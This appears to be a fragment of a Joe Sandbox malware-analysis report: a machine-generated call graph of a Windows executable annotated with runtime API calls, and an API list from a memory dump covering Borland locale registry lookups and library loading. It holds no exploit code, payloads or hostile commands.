117322 6e3f61 38 API calls 117268->117322 117269->117238 117269->117240 117298 6e4381 117269->117298 117325 6e410d DefDlgProcW GetWindowLongW 117270->117325 117271->117231 117271->117243 117339 769e3a ClientToScreen ImageList_DragMove DefDlgProcW 117272->117339 117273 7284d6 117273->117238 117274->117238 117290 6e41d7 117275->117290 117291 6e4361 117275->117291 117323 6e3fe0 59 API calls 117276->117323 117289 6e42b8 GetSysColor 117277->117289 117278 72847f 117278->117240 117304 6e4e5a GetWindowLongW 117278->117304 117293 6e430e 117279->117293 117294 728539 117279->117294 117336 7699f9 6 API calls 117280->117336 117342 769dba 22 API calls 117283->117342 117295 728617 117284->117295 117296 6e4263 117284->117296 117288->117231 117288->117258 117301 6e42d6 SetBkColor 117289->117301 117302 6e42d3 117289->117302 117290->117231 117300 6e41e0 117290->117300 117326 6e3f00 DefDlgProcW PostMessageW PostMessageW GetWindowLongW 117291->117326 117305 728523 117293->117305 117306 6e431a 117293->117306 117335 769f78 GetWindowLongW DefDlgProcW 117294->117335 117341 769b58 54 API calls 117295->117341 117296->117231 117310 7285dc IsThemeActive 117296->117310 117327 6e3f38 18 API calls 117298->117327 117321 6e3ae2 7 API calls 117300->117321 117324 6e4b00 22 API calls 117301->117324 117302->117301 117304->117240 117334 769709 52 API calls ___scrt_fastfail 117305->117334 117316 6e4323 117306->117316 117317 72850c 117306->117317 117307->117231 117318 7284c4 117307->117318 117330 769e94 GetWindowLongW GetWindowRect GetWindowRect MoveWindow 117308->117330 117310->117274 117316->117231 117316->117239 117333 76aca8 27 API calls 117317->117333 117329 76a94e 9 API calls 117318->117329 117321->117238 117322->117238 117323->117238 117324->117238 117325->117238 117326->117238 117327->117238 117328->117278 117329->117273 117330->117238 117331->117273 117332->117238 117333->117238 117334->117273 117335->117238 117336->117238 117337->117238 117338->117273 117339->117238 117340->117273 117341->117273 117342->117238 117343->117238 114958 708f2a 114959 708f37 114958->114959 114963 708f4f 114958->114963 115015 7026cc 19 API calls _abort 114959->115015 114961 708f3c 115016 702610 25 API calls _strftime 114961->115016 114964 708faa 114963->114964 114972 708f47 114963->114972 115017 70fc75 20 API calls 2 library calls 114963->115017 114978 6fd7f5 114964->114978 114967 708fc2 114985 708a62 114967->114985 114969 708fc9 114970 6fd7f5 __fread_nolock 25 API calls 114969->114970 114969->114972 114971 708ff5 114970->114971 114971->114972 114973 6fd7f5 __fread_nolock 25 API calls 114971->114973 114974 709003 114973->114974 114974->114972 114975 6fd7f5 __fread_nolock 25 API calls 114974->114975 114976 709013 114975->114976 114977 6fd7f5 __fread_nolock 25 API calls 114976->114977 114977->114972 114979 6fd816 114978->114979 114980 6fd801 114978->114980 114979->114967 115018 7026cc 19 API calls _abort 114980->115018 114982 6fd806 115019 702610 25 API calls _strftime 114982->115019 114984 6fd811 114984->114967 114986 708a6e ___scrt_is_nonwritable_in_current_image 114985->114986 114987 708a76 114986->114987 114988 708a8e 114986->114988 115086 7026b9 19 API calls _abort 114987->115086 114989 708b54 114988->114989 114993 708ac7 114988->114993 115093 7026b9 19 API calls _abort 114989->115093 114992 708a7b 115087 7026cc 19 API calls _abort 114992->115087 114996 708ad6 114993->114996 114997 708aeb 114993->114997 114994 708b59 115094 7026cc 19 API calls _abort 114994->115094 115088 7026b9 19 API calls _abort 114996->115088 115020 704f73 EnterCriticalSection 114997->115020 115001 708ae3 115095 702610 25 API calls _strftime 115001->115095 115002 708adb 115089 7026cc 19 API calls _abort 115002->115089 115003 708af1 115006 708b22 115003->115006 115007 708b0d 115003->115007 115004 708a83 ___scrt_is_nonwritable_in_current_image 115004->114969 115021 708b75 115006->115021 115090 7026cc 19 API calls _abort 115007->115090 115011 708b1d 115092 708b4c LeaveCriticalSection __wsopen_s 115011->115092 115012 708b12 115091 7026b9 19 API calls _abort 115012->115091 115015->114961 115016->114972 115017->114964 115018->114982 115019->114984 115020->115003 115022 708b87 115021->115022 115027 708b9f 115021->115027 115105 7026b9 19 API calls _abort 115022->115105 115024 708f09 115128 7026b9 19 API calls _abort 115024->115128 115025 708b8c 115106 7026cc 19 API calls _abort 115025->115106 115027->115024 115030 708be4 115027->115030 115029 708f0e 115129 7026cc 19 API calls _abort 115029->115129 115032 708bef 115030->115032 115033 708b94 115030->115033 115037 708c1f 115030->115037 115107 7026b9 19 API calls _abort 115032->115107 115033->115011 115034 708bfc 115130 702610 25 API calls _strftime 115034->115130 115036 708bf4 115108 7026cc 19 API calls _abort 115036->115108 115040 708c38 115037->115040 115041 708c7a 115037->115041 115042 708c5e 115037->115042 115040->115042 115046 708c45 115040->115046 115112 70282e 20 API calls 2 library calls 115041->115112 115109 7026b9 19 API calls _abort 115042->115109 115045 708c63 115110 7026cc 19 API calls _abort 115045->115110 115096 70f74c 115046->115096 115047 708c91 115113 7027f4 115047->115113 115051 708de3 115054 708e59 115051->115054 115058 708dfc GetConsoleMode 115051->115058 115052 708c6a 115111 702610 25 API calls _strftime 115052->115111 115057 708e5d ReadFile 115054->115057 115056 7027f4 _free 19 API calls 115059 708ca1 115056->115059 115060 708ed1 GetLastError 115057->115060 115061 708e77 115057->115061 115058->115054 115062 708e0d 115058->115062 115063 708cc6 115059->115063 115064 708cab 115059->115064 115065 708e35 115060->115065 115066 708ede 115060->115066 115061->115060 115067 708e4e 115061->115067 115062->115057 115068 708e13 ReadConsoleW 115062->115068 115120 709254 115063->115120 115118 7026cc 19 API calls _abort 115064->115118 115083 708c75 __fread_nolock 115065->115083 115123 702696 19 API calls __dosmaperr 115065->115123 115126 7026cc 19 API calls _abort 115066->115126 115079 708eb3 115067->115079 115080 708e9c 115067->115080 115067->115083 115068->115067 115069 708e2f GetLastError 115068->115069 115069->115065 115070 7027f4 _free 19 API calls 115070->115033 115075 708cb0 115119 7026b9 19 API calls _abort 115075->115119 115076 708ee3 115127 7026b9 19 API calls _abort 115076->115127 115082 708eca 115079->115082 115079->115083 115124 708891 30 API calls 2 library calls 115080->115124 115125 7086d1 28 API calls __fread_nolock 115082->115125 115083->115070 115085 708ecf 115085->115083 115086->114992 115087->115004 115088->115002 115089->115001 115090->115012 115091->115011 115092->115004 115093->114994 115094->115001 115095->115004 115097 70f766 115096->115097 115098 70f759 115096->115098 115101 70f772 115097->115101 115132 7026cc 19 API calls _abort 115097->115132 115131 7026cc 19 API calls _abort 115098->115131 115101->115051 115102 70f793 115133 702610 25 API calls _strftime 115102->115133 115103 70f75e 115103->115051 115105->115025 115106->115033 115107->115036 115108->115034 115109->115045 115110->115052 115111->115083 115112->115047 115114 70282c 115113->115114 115115 7027ff RtlFreeHeap 115113->115115 115114->115056 115115->115114 115116 702814 115115->115116 115134 7026cc 19 API calls _abort 115116->115134 115118->115075 115119->115083 115135 7091bb 115120->115135 115123->115083 115124->115083 115125->115085 115126->115076 115127->115083 115128->115029 115129->115034 115130->115033 115131->115103 115132->115102 115133->115103 115134->115114 115136 7051f2 __wsopen_s 25 API calls 115135->115136 115137 7091cd 115136->115137 115138 7091d5 115137->115138 115139 7091e6 SetFilePointerEx 115137->115139 115144 7026cc 19 API calls _abort 115138->115144 115141 7091fe GetLastError 115139->115141 115143 7091da 115139->115143 115145 702696 19 API calls __dosmaperr 115141->115145 115143->115046 115144->115143 115145->115143 117344 6f0a12 117345 6f0a1e ___scrt_is_nonwritable_in_current_image 117344->117345 117374 6f04e7 117345->117374 117347 6f0a25 117348 6f0b6d 117347->117348 117351 6f0a4f 117347->117351 117412 6f0e4d IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 117348->117412 117350 6f0b74 117413 6f4d5e 27 API calls _abort 117350->117413 117362 6f0a8e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 117351->117362 117385 7022a1 117351->117385 117353 6f0b7a 117414 6f4d10 27 API calls _abort 117353->117414 117357 6f0b82 117359 6f0a6e ___scrt_is_nonwritable_in_current_image 117360 6f0aee 117393 6f0f69 117360->117393 117362->117360 117408 6f4d26 37 API calls 2 library calls 117362->117408 117363 6f0af4 117397 6efc28 117363->117397 117368 6f0b10 117368->117350 117369 6f0b14 117368->117369 117370 6f0b1d 117369->117370 117410 6f4d01 27 API calls _abort 117369->117410 117411 6f0671 13 API calls 2 library calls 117370->117411 117373 6f0b25 117373->117359 117375 6f04f0 117374->117375 117415 6f0ca4 IsProcessorFeaturePresent 117375->117415 117377 6f04fc 117416 6f3ed4 10 API calls 3 library calls 117377->117416 117379 6f0501 117384 6f0505 117379->117384 117417 70213b IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 117379->117417 117381 6f051c 117381->117347 117382 6f050e 117382->117381 117418 6f3efd 8 API calls 3 library calls 117382->117418 117384->117347 117386 7022b8 117385->117386 117419 6f11dd 117386->117419 117388 6f0a68 117388->117359 117389 702245 117388->117389 117392 702274 117389->117392 117390 6f11dd _ValidateLocalCookies 5 API calls 117391 70229d 117390->117391 117391->117362 117392->117390 117427 6f3580 117393->117427 117396 6f0f8f 117396->117363 117398 6efc34 IsThemeActive 117397->117398 117399 6efc8f 117397->117399 117429 6f4e6e 117398->117429 117409 6f4c35 GetModuleHandleW 117399->117409 117401 6efc5f 117435 6f4ed4 117401->117435 117403 6efc66 117442 6efc98 SystemParametersInfoW SystemParametersInfoW 117403->117442 117405 6efc6d 117443 6e2d33 117405->117443 117408->117360 117409->117368 117410->117370 117411->117373 117412->117350 117413->117353 117414->117357 117415->117377 117416->117379 117417->117382 117418->117384 117420 6f11e8 IsProcessorFeaturePresent 117419->117420 117421 6f11e6 117419->117421 117423 6f122a 117420->117423 117421->117388 117426 6f11ee SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 117423->117426 117425 6f130d 117425->117388 117426->117425 117428 6f0f7c GetStartupInfoW 117427->117428 117428->117396 117430 6f4e7a ___scrt_is_nonwritable_in_current_image 117429->117430 117492 702e35 EnterCriticalSection 117430->117492 117432 6f4e85 pre_c_initialization 117493 6f4ec5 117432->117493 117434 6f4eba ___scrt_is_nonwritable_in_current_image 117434->117401 117436 6f4efa 117435->117436 117437 6f4ee0 117435->117437 117436->117403 117437->117436 117497 7026cc 19 API calls _abort 117437->117497 117439 6f4eea 117498 702610 25 API calls _strftime 117439->117498 117441 6f4ef5 117441->117403 117442->117405 117444 6e2d43 __wsopen_s 117443->117444 117445 6df38f 21 API calls 117444->117445 117446 6e2d4f GetCurrentDirectoryW 117445->117446 117499 6e2a5e 117446->117499 117492->117432 117496 702e7d LeaveCriticalSection 117493->117496 117495 6f4ecc 117495->117434 117496->117495 117497->117439 117498->117441 117500 6df38f 21 API calls 117499->117500 117501 6e2a74 117500->117501 117608 6e2f4b 117501->117608 117503 6e2a92 117609 6e2f58 __wsopen_s 117608->117609 117610 6df82c 21 API calls 117609->117610 117611 6e2f8a 117609->117611 117610->117611 117612 6df6ad 21 API calls 117611->117612 117621 6e2fc0 117611->117621 117612->117611 117613 6dfa3b 21 API calls 117614 6e30b7 117613->117614 117615 6dfa3b 21 API calls 117615->117621 117617 6df6ad 21 API calls 117617->117621 117618 6e30c3 117618->117503 117619 6e2608 21 API calls 117619->117621 117620 6e308e 117620->117613 117620->117618 117621->117615 117621->117617 117621->117619 117621->117620 115146 6d1033 115151 6e4e91 115146->115151 115150 6d1042 115152 6df38f 21 API calls 115151->115152 115153 6e4eff 115152->115153 115159 6e5c52 115153->115159 115155 6e4f9c 115156 6d1038 115155->115156 115162 6e5bc6 21 API calls __fread_nolock 115155->115162 115158 6f06d4 28 API calls __onexit 115156->115158 115158->115150 115163 6e5c80 115159->115163 115162->115155 115164 6e5c71 115163->115164 115165 6e5c8d 115163->115165 115164->115155 115165->115164 115166 6e5c94 RegOpenKeyExW 115165->115166 115166->115164 115167 6e5cae RegQueryValueExW 115166->115167 115168 6e5ce4 RegCloseKey 115167->115168 115169 6e5ccf 115167->115169 115168->115164 115169->115168 115170 71362f 115199 6d42e9 __fread_nolock messages 115170->115199 115171 6d46c6 115364 744358 79 API calls __wsopen_s 115171->115364 115172 6d469e 115172->115171 115176 6d3713 115172->115176 115174 714310 115175 6d376c 115178 7143c4 115175->115178 115192 6d37a6 messages 115175->115192 115176->115175 115187 6d3c35 messages 115176->115187 115177 6dfbc8 21 API calls 115177->115199 115365 744358 79 API calls __wsopen_s 115178->115365 115179 6d415b 115182 6f042b 21 API calls 115179->115182 115180 6d4887 115185 713cef 115180->115185 115191 6d37bc messages 115180->115191 115180->115192 115182->115192 115184 7143d3 115190 6dfbc8 21 API calls 115185->115190 115185->115191 115187->115179 115187->115180 115187->115192 115190->115191 115192->115191 115193 6dfbc8 21 API calls 115192->115193 115193->115192 115195 7135b9 115362 744358 79 API calls __wsopen_s 115195->115362 115196 6dfa3b 21 API calls 115196->115199 115198 7141b7 115363 72ff7d 21 API calls 115198->115363 115199->115171 115199->115172 115199->115177 115199->115195 115199->115196 115199->115198 115201 7141a4 115199->115201 115204 7141c5 115199->115204 115205 6f042b 21 API calls 115199->115205 115207 6e5eb0 9 API calls 115199->115207 115208 6f045b 21 API calls 115199->115208 115218 74fc5b 83 API calls 115199->115218 115219 6e174b 115199->115219 115223 75a545 115199->115223 115229 759f7b 115199->115229 115232 75a943 115199->115232 115240 747efb 115199->115240 115295 6dbfa2 115199->115295 115352 6d3574 21 API calls 115199->115352 115353 6d914c 91 API calls 115199->115353 115354 741e7c 21 API calls 115199->115354 115355 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 115199->115355 115356 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 115199->115356 115357 757c74 163 API calls 115199->115357 115358 72ff7d 21 API calls 115199->115358 115359 744358 79 API calls __wsopen_s 115201->115359 115360 744358 79 API calls __wsopen_s 115204->115360 115205->115199 115207->115199 115208->115199 115209 7141d7 115361 72ff7d 21 API calls 115209->115361 115218->115199 115220 6e1754 115219->115220 115221 6e1761 115219->115221 115366 6e1cf6 115220->115366 115221->115199 115225 75a558 115223->115225 115224 6d304c 52 API calls 115226 75a5c5 115224->115226 115225->115224 115228 75a567 115225->115228 115372 741c68 115226->115372 115228->115199 115416 758974 115229->115416 115231 759f8b 115231->115199 115233 75a99f 115232->115233 115234 75a95f 115232->115234 115235 6d334c 38 API calls 115233->115235 115236 75a9bf 115233->115236 115234->115199 115235->115236 115236->115234 115237 6d334c 38 API calls 115236->115237 115238 75aa27 115236->115238 115237->115238 115528 740815 115238->115528 115241 747f1a 115240->115241 115242 747f25 115240->115242 115243 6d334c 38 API calls 115241->115243 115245 6df38f 21 API calls 115242->115245 115281 74800b 115242->115281 115243->115242 115244 6f042b 21 API calls 115246 74803e 115244->115246 115247 747f46 115245->115247 115248 6f045b 21 API calls 115246->115248 115249 6df38f 21 API calls 115247->115249 115250 74804f 115248->115250 115251 747f4f 115249->115251 115607 6e1ebe 115250->115607 115253 6d304c 52 API calls 115251->115253 115255 747f5b 115253->115255 115619 6d11ef 21 API calls 115255->115619 115256 6df38f 21 API calls 115258 748062 115256->115258 115260 6e1ebe CloseHandle 115258->115260 115259 747f70 115620 6df78e 21 API calls 115259->115620 115262 748069 115260->115262 115264 6d304c 52 API calls 115262->115264 115263 747fa3 115265 748001 115263->115265 115266 747faa 115263->115266 115267 748075 115264->115267 115271 6d334c 38 API calls 115265->115271 115621 73e9ba GetFileAttributesW FindFirstFileW FindClose 115266->115621 115268 6e1ebe CloseHandle 115267->115268 115270 74807f 115268->115270 115611 6e1ee8 115270->115611 115271->115281 115272 747fb3 115272->115265 115274 6dfa3b 21 API calls 115272->115274 115276 747fca 115274->115276 115622 73e098 25 API calls 115276->115622 115278 748195 GetLastError 115280 7481ae 115278->115280 115279 7480a1 115623 6e1bb6 26 API calls messages 115279->115623 115625 6e17cc CloseHandle messages 115280->115625 115281->115244 115294 74813d 115281->115294 115284 747fd3 115284->115265 115285 7480af 115286 6e174b 3 API calls 115285->115286 115289 7480b6 115286->115289 115287 7480fc 115290 6f042b 21 API calls 115287->115290 115288 7480d0 115624 73daab SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 115288->115624 115289->115287 115289->115288 115291 748130 115290->115291 115293 6df38f 21 API calls 115291->115293 115293->115294 115294->115199 115296 6d32c3 21 API calls 115295->115296 115297 6dbfba 115296->115297 115299 6f042b 21 API calls 115297->115299 115301 71b542 115297->115301 115300 6dbfd3 115299->115300 115302 6f045b 21 API calls 115300->115302 115343 6dc04c 115301->115343 115636 74a7ef 38 API calls 115301->115636 115303 6dbfe4 115302->115303 115304 6e1ebe CloseHandle 115303->115304 115305 6dbfef 115304->115305 115307 6df38f 21 API calls 115305->115307 115306 6d334c 38 API calls 115308 71b5a4 115306->115308 115309 6dbff7 115307->115309 115310 6dc059 115308->115310 115311 71b5ac 115308->115311 115312 6e1ebe CloseHandle 115309->115312 115630 6e1dcc SetFilePointerEx SetFilePointerEx SetFilePointerEx 115310->115630 115314 6d334c 38 API calls 115311->115314 115316 6dbffe 115312->115316 115315 6dc060 115314->115315 115320 71b5c1 115315->115320 115321 6dc07a 115315->115321 115317 6d304c 52 API calls 115316->115317 115318 6dc00a 115317->115318 115319 6e1ebe CloseHandle 115318->115319 115322 6dc014 115319->115322 115324 6f045b 21 API calls 115320->115324 115325 6df38f 21 API calls 115321->115325 115323 6e1ee8 5 API calls 115322->115323 115327 6dc025 115323->115327 115328 71b5c7 115324->115328 115326 6dc082 115325->115326 115631 6e1af9 27 API calls 115326->115631 115329 6dc02d 115327->115329 115330 71b53a 115327->115330 115331 71b5db 115328->115331 115626 6e1762 115328->115626 115629 6e1bb6 26 API calls messages 115329->115629 115635 6e17cc CloseHandle messages 115330->115635 115334 741c03 21 API calls 115331->115334 115341 71b5df __fread_nolock 115331->115341 115334->115341 115336 6dc091 115336->115341 115632 6d326c 21 API calls 115336->115632 115339 6dc03b 115340 6e174b 3 API calls 115339->115340 115345 6dc042 115340->115345 115342 6dc0a5 115346 6dc0df 115342->115346 115347 6e1ebe CloseHandle 115342->115347 115343->115306 115343->115310 115344 71b503 115634 73daab SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 115344->115634 115345->115343 115345->115344 115346->115199 115349 6dc0d3 115347->115349 115349->115346 115633 6e17cc CloseHandle messages 115349->115633 115350 71b51a 115350->115343 115352->115199 115353->115199 115354->115199 115355->115199 115356->115199 115357->115199 115358->115199 115359->115198 115360->115209 115361->115171 115362->115198 115363->115171 115364->115174 115365->115184 115367 6e1d0d 115366->115367 115368 727440 SetFilePointerEx 115367->115368 115369 6e1d96 SetFilePointerEx SetFilePointerEx 115367->115369 115370 72742f 115367->115370 115371 6e1d60 115367->115371 115369->115371 115370->115368 115371->115221 115373 741c75 115372->115373 115374 6f042b 21 API calls 115373->115374 115375 741c7c 115374->115375 115378 740156 115375->115378 115377 741cb6 115377->115228 115379 6dfaa1 21 API calls 115378->115379 115380 740169 CharLowerBuffW 115379->115380 115382 74017c 115380->115382 115381 6df6ad 21 API calls 115381->115382 115382->115381 115383 7401ba 115382->115383 115395 740186 ___scrt_fastfail 115382->115395 115384 7401cc 115383->115384 115411 6df6ad 115383->115411 115386 6f045b 21 API calls 115384->115386 115390 7401fa 115386->115390 115389 740259 115392 6f042b 21 API calls 115389->115392 115389->115395 115391 74021c 115390->115391 115414 74008e 21 API calls 115390->115414 115396 7402af 115391->115396 115393 740273 115392->115393 115394 6f045b 21 API calls 115393->115394 115394->115395 115395->115377 115397 6df38f 21 API calls 115396->115397 115398 7402e1 115397->115398 115399 6df38f 21 API calls 115398->115399 115400 7402ea 115399->115400 115401 6df38f 21 API calls 115400->115401 115409 7402f3 115401->115409 115402 7405b7 115402->115389 115403 6df82c 21 API calls 115403->115409 115404 6f62b3 GetStringTypeW 115404->115409 115405 6df5c0 21 API calls 115405->115409 115407 6f61fc 38 API calls 115407->115409 115408 7402af 40 API calls 115408->115409 115409->115402 115409->115403 115409->115404 115409->115405 115409->115407 115409->115408 115410 6dfbc8 21 API calls 115409->115410 115415 6f62dd GetStringTypeW _strftime 115409->115415 115410->115409 115412 6dfaa1 21 API calls 115411->115412 115413 6df6b8 115412->115413 115413->115384 115414->115390 115415->115409 115417 6d304c 52 API calls 115416->115417 115418 7589ab 115417->115418 115440 7589f0 messages 115418->115440 115453 7596f4 115418->115453 115420 758c9c 115421 758e6a 115420->115421 115425 758caa 115420->115425 115502 7598c8 59 API calls 115421->115502 115423 758e79 115424 758e85 115423->115424 115423->115425 115424->115440 115466 7588a1 115425->115466 115426 6d304c 52 API calls 115443 758a64 115426->115443 115431 758ce3 115481 6f02c0 115431->115481 115434 758d03 115486 744358 79 API calls __wsopen_s 115434->115486 115435 758d1d 115487 6d2b1f 115435->115487 115438 758d0e GetCurrentProcess TerminateProcess 115438->115435 115440->115231 115443->115420 115443->115426 115443->115440 115485 758f38 41 API calls _strftime 115443->115485 115445 758ee0 115445->115440 115448 758ef4 FreeLibrary 115445->115448 115446 758d5c 115499 759598 75 API calls 115446->115499 115448->115440 115452 758d6d 115452->115445 115500 6d2510 21 API calls 115452->115500 115501 6d3574 21 API calls 115452->115501 115503 759598 75 API calls 115452->115503 115454 6dfaa1 21 API calls 115453->115454 115455 759711 CharLowerBuffW 115454->115455 115504 739d33 115455->115504 115459 6df38f 21 API calls 115460 75974d 115459->115460 115511 6df4fe 21 API calls __fread_nolock 115460->115511 115462 759761 115463 6df9a0 21 API calls 115462->115463 115464 75976b _wcslen 115463->115464 115465 759866 _wcslen 115464->115465 115512 758f38 41 API calls _strftime 115464->115512 115465->115443 115467 758907 115466->115467 115468 7588bc 115466->115468 115472 759a7c 115467->115472 115469 6f045b 21 API calls 115468->115469 115470 7588de 115469->115470 115470->115467 115471 6f042b 21 API calls 115470->115471 115471->115470 115473 759c95 messages 115472->115473 115480 759aa0 _strcat _wcslen 115472->115480 115473->115431 115474 6d3400 38 API calls 115474->115480 115475 6d334c 38 API calls 115475->115480 115476 6d33b0 38 API calls 115476->115480 115477 6d304c 52 API calls 115477->115480 115478 6fe8ac 20 API calls ___std_exception_copy 115478->115480 115480->115473 115480->115474 115480->115475 115480->115476 115480->115477 115480->115478 115515 73fe37 23 API calls _wcslen 115480->115515 115483 6f02d5 115481->115483 115482 6f036d EnumWindows 115484 6f033b 115482->115484 115483->115482 115483->115484 115484->115434 115484->115435 115485->115443 115486->115438 115488 6d2b27 115487->115488 115489 6f042b 21 API calls 115488->115489 115490 6d2b35 115489->115490 115516 6d2a2a 115490->115516 115493 6d2830 115519 6d2940 115493->115519 115495 6d2840 115496 6f045b 21 API calls 115495->115496 115497 6d28d8 115495->115497 115496->115497 115497->115452 115498 6d2510 21 API calls 115497->115498 115498->115446 115499->115452 115500->115452 115501->115452 115502->115423 115503->115452 115505 739d53 _wcslen 115504->115505 115506 739d92 115505->115506 115508 739d88 115505->115508 115509 739e4a 115505->115509 115506->115459 115506->115464 115508->115506 115513 6df577 40 API calls 115508->115513 115509->115506 115514 6df577 40 API calls 115509->115514 115511->115462 115512->115465 115513->115508 115514->115509 115515->115480 115517 6f042b 21 API calls 115516->115517 115518 6d2a37 115517->115518 115518->115493 115520 6d294d 115519->115520 115521 7129e7 115520->115521 115526 6d2957 messages 115520->115526 115522 6f042b 21 API calls 115521->115522 115524 7129f6 115522->115524 115523 6d295e 115523->115495 115526->115523 115527 6d3490 21 API calls messages 115526->115527 115527->115526 115561 74074d 52 API calls _strftime 115528->115561 115530 740834 115531 740896 115530->115531 115532 7408ae 115530->115532 115555 74083a __fread_nolock 115530->115555 115562 740a92 56 API calls __fread_nolock 115531->115562 115533 740921 115532->115533 115537 740918 115532->115537 115542 7408cb 115532->115542 115535 740953 115533->115535 115536 7409b9 115533->115536 115533->115555 115538 740983 115535->115538 115539 740958 115535->115539 115540 7409c2 115536->115540 115541 740a59 115536->115541 115537->115533 115560 7408ff 115537->115560 115538->115555 115577 6d33b0 38 API calls 115538->115577 115539->115555 115576 6d33b0 38 API calls 115539->115576 115543 7409c7 115540->115543 115544 740a38 115540->115544 115541->115555 115581 6d3400 38 API calls 115541->115581 115563 742bf2 115542->115563 115548 740a06 115543->115548 115549 7409cd 115543->115549 115544->115555 115580 6d3400 38 API calls 115544->115580 115548->115555 115579 6d3400 38 API calls 115548->115579 115549->115555 115578 6d3400 38 API calls 115549->115578 115554 7408d3 115557 742bf2 23 API calls 115554->115557 115555->115234 115558 7408ea __fread_nolock 115557->115558 115559 742bf2 23 API calls 115558->115559 115559->115560 115567 741c03 115560->115567 115561->115530 115562->115555 115564 742c00 115563->115564 115565 742bfb 115563->115565 115564->115554 115582 741ce5 115565->115582 115568 741c0e 115567->115568 115569 6f042b 21 API calls 115568->115569 115570 741c15 115569->115570 115571 741c21 115570->115571 115572 741c42 115570->115572 115573 6f045b 21 API calls 115571->115573 115574 6f045b 21 API calls 115572->115574 115575 741c2a ___scrt_fastfail 115573->115575 115574->115575 115575->115555 115576->115555 115577->115555 115578->115555 115579->115555 115580->115555 115581->115555 115583 741cfc 115582->115583 115598 741e15 115582->115598 115584 741d49 115583->115584 115585 741d1c 115583->115585 115587 741d60 115583->115587 115586 6f045b 21 API calls 115584->115586 115585->115584 115589 741d30 115585->115589 115593 741d3e __fread_nolock 115586->115593 115590 6f045b 21 API calls 115587->115590 115599 741d7d 115587->115599 115588 741da4 115591 6f045b 21 API calls 115588->115591 115592 6f045b 21 API calls 115589->115592 115590->115599 115594 741daa 115591->115594 115592->115593 115595 6f042b 21 API calls 115593->115595 115601 7419fa 115594->115601 115595->115598 115598->115564 115599->115588 115599->115589 115599->115593 115602 6f045b 21 API calls 115601->115602 115603 741a11 115602->115603 115604 6f042b 21 API calls 115603->115604 115605 741a1d 115604->115605 115606 6f00d3 23 API calls 115605->115606 115606->115593 115608 6e1ec8 115607->115608 115609 6e1ed7 115607->115609 115608->115256 115609->115608 115610 6e1edc CloseHandle 115609->115610 115610->115608 115612 6e1eff CreateFileW 115611->115612 115613 727466 115611->115613 115616 6e1f1e 115612->115616 115614 72746c CreateFileW 115613->115614 115613->115616 115615 727494 115614->115615 115614->115616 115617 6e1cf6 3 API calls 115615->115617 115616->115278 115616->115279 115618 72749f 115617->115618 115618->115616 115619->115259 115620->115263 115621->115272 115622->115284 115623->115285 115624->115287 115625->115294 115637 6e1e10 115626->115637 115629->115339 115630->115315 115631->115336 115632->115342 115633->115346 115634->115350 115635->115301 115636->115301 115638 6e1e8d SetFilePointerEx 115637->115638 115640 6e1e21 115637->115640 115638->115640 115639 6e1773 115639->115331 115640->115639 115641 6e1e5e ReadFile 115640->115641 115641->115639 115641->115640

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 014A19F0
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A0E
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A2C
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 014A1A4A
                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 014A1A93
                                                                                                  • RegQueryValueExA.ADVAPI32(?,014A1C55,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001), ref: 014A1AB1
                                                                                                  • RegCloseKey.ADVAPI32(?,014A1AE0,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1AD3
                                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 014A1AF0
                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 014A1AFD
                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 014A1B03
                                                                                                  • lstrlen.KERNEL32(00000000), ref: 014A1B2E
                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1B83
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1B93
                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 014A1BBF
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BCF
                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1BF9
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 014A1C09
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
